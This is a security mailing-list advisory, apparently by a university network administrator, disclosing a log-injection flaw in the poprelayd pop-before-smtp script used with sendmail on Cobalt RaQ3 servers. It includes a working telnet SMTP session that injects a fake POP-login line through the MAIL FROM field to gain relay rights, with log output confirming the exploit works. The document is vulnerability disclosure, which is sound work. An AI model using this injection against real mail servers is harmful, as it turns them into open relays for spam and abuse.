poprelayd and sendmail relay authentication problem (Cobalt Raq3)

[Andrea Barisani <lcars () infis univ trieste it>]

Hi to all,

Poprelayd is a simple script that scan /var/log/maillog for valid pop
logins and updates a hash db used by sendmail to permit relaying for
those valid pop users, this method is called "Pop-before-smtp".

The syslog string searched by the script is in this form for the qpop
server
        
/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)

On some cobalt raq3 servers (with the poprelayd add-on packet installed )  
and in general on any system running the poprelayd script with sendmail is
possible to "inject" this string in the syslog using sendmail logging. So
anyone can insert a fake string with his own IP wich will be parsed by
poprelayd and that will permit the use of sendmail as a relay.

On cobalts the presence of poprelayd is revealed by the modified sendmail
relaying denied message "Relaying denied. Please check your mail first." 

Example:

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required

now the IP 66.66.66.66 can do relay :)

in fact, on dumbcobalt:

in /var/log/maillog

...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org", size=0, class=0 ....etc etc...

[root@dumbcobalt /]# /usr/sbin/poprelayd -p
66.66.66.66     7

;-)

Bye

------------------------------------------------------------
INFIS Network Administrator & Security Officer
Department of Physics       - University of Trieste
lcars () infis univ trieste it - PGP Key 0x8E21FE82
------------------------------------------------------------
"How would you know I'm mad?" said Alice.
"You must be,'said the Cat,'or you wouldn't have come here."
------------------------------------------------------------